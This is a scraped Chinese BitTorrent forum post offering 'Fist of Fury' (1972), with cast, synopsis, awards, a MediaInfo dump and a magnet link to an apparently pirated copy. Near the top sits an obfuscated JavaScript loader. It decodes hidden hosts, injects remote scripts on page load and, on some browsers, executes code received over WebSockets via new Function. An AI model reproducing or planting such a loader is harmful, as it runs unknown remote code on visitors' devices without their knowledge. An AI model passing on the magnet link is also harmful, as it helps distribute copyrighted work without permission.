精武门[国粤语配音/中文字幕].Fist.of.Fury.aka.The.Chinese.Connection.1972.4K.Remaster.1080p.BluRay.x265.10bit.DTS.2Audio 8.97GB

版主小s 21天前 219

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

image.png

◎译 名 精武门 / Fist of Fury

◎片 名 精武門

◎年 代 1972

◎产 地 中国香港

◎类 别 剧情 / 动作 / 爱情 / 惊悚

◎语 言 粤语 / 英语

◎上映日期 1972-03-22

◎IMDb链接 https://www.imdb.com/title/tt0068767/

◎豆瓣评分 8.5/10 (35483人评价)

◎豆瓣链接 https://movie.douban.com/subject/1294991/

◎片 长 102分钟

◎导 演 罗维 Wei Lo (id:1328734)

◎编 剧 倪匡 Kuang Ni (id:1275879)

◎演 员 李小龙 Bruce Lee (id:1036369)

苗可秀 Nora Miao (id:1005207)

田丰 Feng Tien (id:1019621)

元奎 Corey Yuen (id:1289150)

罗维 Wei Lo (id:1328734)

韩英杰 Ying-Chieh Han (id:1274444)

衣依 Maria Yi (id:1318566)

田俊 James Tien Chun (id:1352930)

陈龙 Peter Chan Lung (id:1321791)

陈会毅 Billy Chan (id:1280414)

魏平澳 Ping-Ao Wei (id:1136187)

吴明才 Ming-tsai Wu (id:1315560)

韩国材 Kwok Choi Hon (id:1343053)

张佩山 Pei-Shan Chang (id:1331539)

黄宗迅 Chung-Hsin Huang (id:1101334)

小麒麟 Little Unicorn (id:1348010)

甘山 San Gam (id:1316752)

金天柱 Tien-Chu Chin (id:1417197)

葛萍 Ping Ko (id:1414682)

元武 Wu Yuan (id:1344878)

李擎柱 King Chu Lee (id:1330748)

黃志明 Chi-Ming Wong (id:1398969)

冯毅 Fung Ngai (id:1342238)

金军 Chun Chin (id:1397190)

岑潜波 Chien-Po Tsen (id:1373123)

李超俊 Chiao Chun Li (id:1395765)

张照 Hsi Chang (id:1389330)

桥本力 Riki Hashimoto (id:1348655)

顾占熊 Tsan-Hsiung Ku (id:1423749)

齐琳 Chai Lam (id:1425867)

周嘉崇 Chia-Chung Chou (id:1423748)

林正英 Ching-Ying Lam (id:1016823)

李小龙 Bruce Lee (id:1036369)

邹文怀 Raymond Chow (id:1016883)

张耀宗 Peter Cheung (id:1280650)

许迪文 Dik-Man Hui (id:1349009)

◎标 签 李小龙 / 动作 / 香港 / 功夫 / 香港电影 / 1972 / 经典 / 中国

◎简 介

大侠霍元甲头七之日,日本虹口武道场翻译胡恩(魏平澳 饰)受铃木宽(桥本力 饰)委派,带人上精武馆挑衅。霍元甲五弟子陈真(李小龙 饰)不堪其辱,孤身赴武道场应战,大败数十人。铃木宽大怒,派人打砸精武馆,并限三天交出陈真。为保陈真性命,大师兄(田丰 饰)命令陈真离开上海。当夜,陈真意外发现师父被毒害的线索,盛怒之下手刃凶手(黄宗迅 饰)及其内应(韩英杰 饰),并决定挖出幕后主使……

◎获奖情况 (共3项)

第10届台北金马影展 (1972)

金马奖 最佳剧情片(提名)

金马奖 最佳剪辑

└──张耀宗 (id:1280650)

金马奖 最佳演员特別奖

└──李小龙 (id:1036369)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 287968853701725648468478559396504489034 (0xD8A4C8A9B4A2A2094B0FDE8D55634C4A)

  4. Complete name : Fist.of.Fury.aka.The.Chinese.Conne[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 8.97 GiB

  8. Duration : 1 h 46 min

  9. Overall bit rate : 12.0 Mb/s

  10. Encoded date : UTC 2021-09-30 14:03:01

  11. Writing application : mkvmerge v55.0.0 ('Waiting For Space') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 46 min

  20. Bit rate : 8 989 kb/s

  21. Width : 1 920 pixels

  22. Height : 820 pixels

  23. Display aspect ratio : 2.35:1

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.238

  30. Stream size : 6.70 GiB (75%)

  31. Writing library : x265 3.4+1-g07e3381df+31:[Windows][GCC 10.1.0][64 bit] Yuuki 10bit+8bit+12bit

  32. Encoding settings : rc=crf / crf=18.0000 / qcomp=0.70 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.70 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x820 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.01 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  33. Language : English

  34. Default : Yes

  35. Forced : No


  36. Audio #1

  37. ID : 2

  38. ID in the original source medium : 4352 (0x1100)

  39. Format : DTS

  40. Format/Info : Digital Theater Systems

  41. Codec ID : A_DTS

  42. Duration : 1 h 46 min

  43. Bit rate mode : Constant

  44. Bit rate : 1 509 kb/s

  45. Channel(s) : 6 channels

  46. Channel layout : C L R Ls Rs LFE

  47. Sampling rate : 48.0 kHz

  48. Frame rate : 93.750 FPS (512 SPF)

  49. Bit depth : 24 bits

  50. Compression mode : Lossy

  51. Stream size : 1.12 GiB (13%)

  52. Title : Cantonese

  53. Language : Chinese

  54. Default : Yes

  55. Forced : No

  56. Original source medium : Blu-ray


  57. Audio #2

  58. ID : 3

  59. ID in the original source medium : 4353 (0x1101)

  60. Format : DTS

  61. Format/Info : Digital Theater Systems

  62. Codec ID : A_DTS

  63. Duration : 1 h 46 min

  64. Bit rate mode : Constant

  65. Bit rate : 1 509 kb/s

  66. Channel(s) : 6 channels

  67. Channel layout : C L R Ls Rs LFE

  68. Sampling rate : 48.0 kHz

  69. Frame rate : 93.750 FPS (512 SPF)

  70. Bit depth : 24 bits

  71. Compression mode : Lossy

  72. Stream size : 1.12 GiB (13%)

  73. Title : Mandarin

  74. Language : Chinese

  75. Default : No

  76. Forced : No

  77. Original source medium : Blu-ray


  78. Text #1

  79. ID : 4

  80. ID in the original source medium : 4609 (0x1201)

  81. Format : PGS

  82. Muxing mode : zlib

  83. Codec ID : S_HDMV/PGS

  84. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  85. Duration : 1 h 43 min

  86. Bit rate : 18.3 kb/s

  87. Count of elements : 1261

  88. Stream size : 13.6 MiB (0%)

  89. Title : chs

  90. Language : Chinese

  91. Default : Yes

  92. Forced : No

  93. Original source medium : Blu-ray


  94. Text #2

  95. ID : 5

  96. ID in the original source medium : 4608 (0x1200)

  97. Format : PGS

  98. Muxing mode : zlib

  99. Codec ID : S_HDMV/PGS

  100. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  101. Duration : 1 h 43 min

  102. Bit rate : 19.6 kb/s

  103. Count of elements : 1261

  104. Stream size : 14.6 MiB (0%)

  105. Title : cht

  106. Language : Chinese

  107. Default : No

  108. Forced : No

  109. Original source medium : Blu-ray


  110. Text #3

  111. ID : 6

  112. ID in the original source medium : 4610 (0x1202)

  113. Format : PGS

  114. Muxing mode : zlib

  115. Codec ID : S_HDMV/PGS

  116. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  117. Duration : 1 h 43 min

  118. Bit rate : 14.9 kb/s

  119. Count of elements : 1261

  120. Stream size : 11.1 MiB (0%)

  121. Language : English

  122. Default : No

  123. Forced : No

  124. Original source medium : Blu-ray


  125. Menu

  126. 00:00:00.000 : en:第 01 章

  127. 00:02:28.750 : en:第 02 章

  128. 00:08:44.791 : en:第 03 章

  129. 00:15:49.541 : en:第 04 章

  130. 00:21:37.583 : en:第 05 章

  131. 00:27:29.416 : en:第 06 章

  132. 00:33:57.416 : en:第 07 章

  133. 00:38:19.958 : en:第 08 章

  134. 00:41:40.291 : en:第 09 章

  135. 00:45:09.333 : en:第 10 章

  136. 00:48:59.041 : en:第 11 章

  137. 00:56:46.291 : en:第 12 章

  138. 01:01:04.208 : en:第 13 章

  139. 01:06:29.791 : en:第 14 章

  140. 01:12:30.708 : en:第 15 章

  141. 01:16:31.041 : en:第 16 章

  142. 01:21:04.833 : en:第 17 章

  143. 01:28:12.500 : en:第 18 章

  144. 01:36:25.083 : en:第 19 章

  145. 01:41:42.166 : en:第 20 章




复制代码


TAGS 动作 剧情 惊悚 爱情

磁力链:
  • magnet:?xt=urn:btih:D68EE11390866385AFFBC0EFD6DE0142313FD8CA
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回